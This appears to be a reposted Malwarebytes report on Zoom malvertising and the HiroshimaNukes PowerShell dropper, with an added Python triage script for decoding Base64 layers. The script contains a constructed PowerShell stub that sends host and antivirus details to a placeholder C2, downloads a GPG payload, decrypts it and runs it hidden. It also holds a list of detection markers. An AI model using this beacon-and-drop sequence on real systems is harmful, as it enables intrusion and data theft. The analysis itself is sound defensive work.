While Zoom is used by millions of people around the world, these campaigns appear to target cryptocurrency users as well as corporate users, the latter as a way into company networks.
The threat actors are using a number of fake identities to create multiple advertiser accounts.
While we don't know how many people may have fallen for these Zoom malvertising campaigns, we can say that the number of ads and their positioning was prominent enough to generate a substantial amount of traffic.
The threat actors are using tracking templates (an ad-platform feature meant for appending click-tracking parameters) to cloak the redirection mechanism, sending visitors either to the legitimate Zoom website or to a site of their choosing.
HiroshimaNukes is a name given by its author to a piece of malware that was new to us.
Its goal is to drop additional malware, typically a stealer followed by data exfiltration.
DLL side-loading is a technique used by threat actors to bypass detection.
While DLL side-loading is commonly used by malware authors, it is a distinctive TTP that not every malvertising campaign uses.
That distinctiveness let us search for previous similar attacks from the same threat actor.
The threat actors are tracking victims from their campaigns using a control panel called Hunting panel 1.40 which was new to us.
Malware payload. The malicious installer contains several files but the malicious components reside in the PowerShell scripts.
Hiding the malicious logic in PowerShell scripts rather than shipping a traditional malware binary is a technique this threat actor has used for months already, probably because it yields higher infection rates.
Decoding the Base64-encoded PowerShell reveals the malware's command and control server along with several other routines: reporting telemetry about the machine and any installed security software back to the server and, more importantly, fetching a GPG-encrypted payload that is decrypted on the fly.
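The first analyst step on a sample like this is to peel the Base64 layers off the PowerShell and pull out the indicators the post lists: the C2 address, the security-software enumeration, and the GPG decryption step. The script below is an added example, not Malwarebytes' tooling or anything from the actual HiroshimaNukes dropper: it decodes a constructed stub in the same shape (UTF-16LE Base64, as `powershell -EncodedCommand` expects, with a nested UTF-8 `FromBase64String` layer), then extracts URLs, hosts and behaviour markers. The domain, the passphrase and the script contents are invented; `c2.example.invalid` is a reserved name, not a real C2.

```python
import base64
import re
from urllib.parse import urlparse

# Second-stage stub, embedded in the outer script as a plain UTF-8 Base64 literal
# (the form [Text.Encoding]::UTF8.GetString expects). Constructed sample.
INNER_SCRIPT = 'Start-Process -FilePath "$env:TEMP\\stage2.exe" -WindowStyle Hidden'
INNER_B64 = base64.b64encode(INNER_SCRIPT.encode("utf-8")).decode()

# Outer script in the shape of a telemetry-and-drop stub. Constructed sample;
# the .invalid domain is reserved and the passphrase is made up.
OUTER_SCRIPT = (
    '$c2 = "http://c2.example.invalid/gate.php"\n'
    '$av = (Get-CimInstance -Namespace root/SecurityCenter2 '
    '-ClassName AntiVirusProduct).displayName\n'
    'Invoke-WebRequest -Uri "$c2?host=$env:COMPUTERNAME&av=$av" -UseBasicParsing\n'
    'Invoke-WebRequest -Uri "http://c2.example.invalid/p.gpg" -OutFile "$env:TEMP\\p.gpg"\n'
    '& gpg --batch --passphrase "secret" -o "$env:TEMP\\stage2.exe" -d "$env:TEMP\\p.gpg"\n'
    f'IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("{INNER_B64}")))\n'
)
# What `powershell -EncodedCommand` actually consumes: UTF-16LE text, then Base64.
ENCODED_COMMAND = base64.b64encode(OUTER_SCRIPT.encode("utf-16-le")).decode()

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
NESTED_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
# Behaviours worth surfacing in triage; matched case-insensitively. Assumed list.
BEHAVIOUR_MARKERS = (
    "AntiVirusProduct",    # enumerating installed security products
    "Invoke-WebRequest",   # beacon / download
    "DownloadString",
    "gpg",                 # on-the-fly decryption of a GPG blob
    "FromBase64String",    # another encoded layer
    "IEX",
    "Invoke-Expression",
)


def decode_layer(b64):
    """Decode one Base64 layer. -EncodedCommand text is UTF-16LE, which shows
    up as NUL bytes in the odd positions; anything else is treated as UTF-8."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def unpack_layers(b64, max_depth=5):
    """Return every decoded layer, outermost first, following FromBase64String
    literals until none remain. max_depth stops a self-referencing blob looping."""
    layers = []
    queue = [b64]
    while queue and len(layers) < max_depth:
        layers.append(decode_layer(queue.pop(0)))
        queue.extend(NESTED_B64_RE.findall(layers[-1]))
    return layers


def triage(b64):
    """Decode all layers and summarise network indicators and behaviours."""
    layers = unpack_layers(b64)
    text = "\n".join(layers)
    urls = sorted(set(URL_RE.findall(text)))
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    behaviours = [m for m in BEHAVIOUR_MARKERS
                  if re.search(re.escape(m), text, re.IGNORECASE)]
    return {"layers": len(layers), "urls": urls, "hosts": hosts,
            "behaviours": behaviours}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(ENCODED_COMMAND), indent=2))
```

The UTF-16LE heuristic matters in practice: decoding an `-EncodedCommand` blob as UTF-8 gives text with a NUL after every character, which defeats naive string and URL matching. Run against a real sample, replace `ENCODED_COMMAND` with the blob lifted from the installer's script and expect the GPG step to show up as a `gpg` invocation or a `.gpg` download; the payload itself still has to be decrypted with whatever passphrase the script carries.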
We surmise this panel is how the threat actor tracks their malvertising and payload delivery campaigns.
The panel's background image is from the Firewatch video game.
Malvertising continues to be a preferred malware delivery vector, one where threat actors are able to bypass ad verification checks and, often, security solutions as well.
We are actively tracking and reporting each new malvertising campaign we come across.
As we can't always control when third parties will take action on malicious ads, our top priority is to ensure our customers remain protected by blocking new malware domains and samples.
Both our consumer and enterprise users are protected against these threats.
We would like to thank Sergei Frankoff, malware researcher and a co-founder of Open Analysis, for his help with the HiroshimaNukes dropper.
This Cyber News was published on www.malwarebytes.com. Publication date: Wed, 13 Dec 2023 17:13:04 +0000